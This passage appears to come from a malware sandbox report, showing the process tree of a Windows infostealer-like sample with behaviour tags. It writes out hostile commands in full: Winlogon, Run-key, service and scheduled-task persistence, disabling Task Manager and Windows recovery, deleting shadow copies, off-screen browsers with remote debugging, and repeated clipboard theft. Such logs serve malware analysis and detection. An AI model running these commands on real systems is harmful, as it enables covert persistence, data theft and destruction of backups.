      powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\ReQYAIePmlS5_tezmp.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FO CSV /NH"
    3⤵
    PID:2572
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO CSV /NH
      4⤵
      Enumerates processes with tasklist
      PID:5340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
    3⤵
    PID:1084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp""
    3⤵
    PID:3112
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:5276
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
    3⤵
    PID:5396
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
      4⤵
      PID:928
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400
    3⤵
    - Uses browser remote debugging
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:3736
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffbaa2fdcf8,0x7ffbaa2fdd04,0x7ffbaa2fdd10
      4⤵
      PID:2088
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=fr --service-sandbox-type=none --string-annotations --field-trial-handle=1588,i,3965362711002067373,8571633052630631974,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2116 /prefetch:3
      4⤵
      PID:5456
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2088,i,3965362711002067373,8571633052630631974,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2084 /prefetch:2
      4⤵
      PID:6140
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=fr --service-sandbox-type=service --string-annotations --field-trial-handle=2404,i,3965362711002067373,8571633052630631974,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2544 /prefetch:8
      4⤵
      PID:6060
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=fr --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3264,i,3965362711002067373,8571633052630631974,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3304 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5292
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=fr --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3272,i,3965362711002067373,8571633052630631974,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3324 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1448
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=fr --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4256,i,3965362711002067373,8571633052630631974,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4280 /prefetch:2
      4⤵
      Uses browser remote debugging
      PID:772
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=fr --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4632,i,3965362711002067373,8571633052630631974,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4640 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2596
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400
    3⤵
    - Uses browser remote debugging
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:3520
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x290,0x7ffbb1e1f208,0x7ffbb1e1f214,0x7ffbb1e1f220
      4⤵
      PID:980
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=fr --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1940,i,4052425415634637956,15116873549564981225,262144 --variations-seed-version --mojo-platform-channel-handle=2364 /prefetch:3
      4⤵
      PID:5356
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2176,i,4052425415634637956,15116873549564981225,262144 --variations-seed-version --mojo-platform-channel-handle=2172 /prefetch:2
      4⤵
      PID:5952
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=fr --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2008,i,4052425415634637956,15116873549564981225,262144 --variations-seed-version --mojo-platform-channel-handle=2560 /prefetch:8
      4⤵
      PID:3112
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=fr --js-flags=--ms-user-locale=fr_FR --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3448,i,4052425415634637956,15116873549564981225,262144 --variations-seed-version --mojo-platform-channel-handle=3532 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4512
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=fr --js-flags=--ms-user-locale=fr_FR --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3456,i,4052425415634637956,15116873549564981225,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "sc create WindowsNovaBooter binPath= "C:\Users\Admin\AppData\Local\Microsoft\MagTable\efdzdfzedzed.exe" start= auto obj= LocalSystem"
    3⤵
    PID:2184
  - - C:\Windows\system32\sc.exe
      sc create WindowsNovaBooter binPath= "C:\Users\Admin\AppData\Local\Microsoft\MagTable\efdzdfzedzed.exe" start= auto obj= LocalSystem
      4⤵
      Launches sc.exe
      PID:4084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit"
    3⤵
    PID:6112
  - - C:\Windows\system32\reg.exe
      reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit
      4⤵
      PID:3620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\Program Files\Windows NT\TableTextService\efdzdfzedzed.exe" /f"
    3⤵
    PID:1336
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\Program Files\Windows NT\TableTextService\efdzdfzedzed.exe" /f
      4⤵
      Modifies WinLogon for persistence
      PID:8
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Windows_Health_Courtage_5lZCgv"
    3⤵
    PID:5924
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Windows_Health_Courtage_5lZCgv
      4⤵
      PID:2552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Windows_Health_Courtage_5lZCgv"
    3⤵
    PID:448
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Windows_Health_Courtage_5lZCgv
      4⤵
      PID:1936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetup5lZCgv /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe\" /F /rl highest"
    3⤵
    PID:2232
  - - C:\Windows\system32\cmd.exe
      cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetup5lZCgv /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe\" /F /rl highest
      4⤵
      PID:2300
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /sc onlogon /tn WindowsDriverSetup5lZCgv /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe\" /F /rl highest
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\efdzdfzedzed.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""
    3⤵
    PID:1012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"
    3⤵
    PID:2564
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      PID:5828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\cnYchlKtNXpS.vbs"
    3⤵
    PID:2072
  - - C:\Windows\system32\cscript.exe
      cscript C:\Users\Admin\AppData\Roaming\cnYchlKtNXpS.vbs
      4⤵
      PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reagentc /disable"
    3⤵
    PID:4436
  - - C:\Windows\system32\ReAgentc.exe
      reagentc /disable
      4⤵
      Drops file in System32 directory
      Drops file in Windows directory
      PID:3484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Windows_Health_Courtage_5lZCgv /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe /f"
    3⤵
    PID:60
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Windows_Health_Courtage_5lZCgv /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe /f
      4⤵
      Adds Run key to start application
      PID:2640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Windows_Health_Courtage_5lZCgv /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe /f"
    3⤵
    PID:1988
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Windows_Health_Courtage_5lZCgv /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe /f
      4⤵
      Adds Run key to start application
      PID:4848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "vssadmin delete shadows /all /quiet"
    3⤵
    PID:3692
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:6000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4716
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:644
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1512
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1168
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:5052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:216
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1140
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5852
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:216
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1140
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:3720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3728
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2752
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:5620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1140
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:456
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1512
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:4652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4660
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4784
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1176
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:3720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4680
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:644
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4952
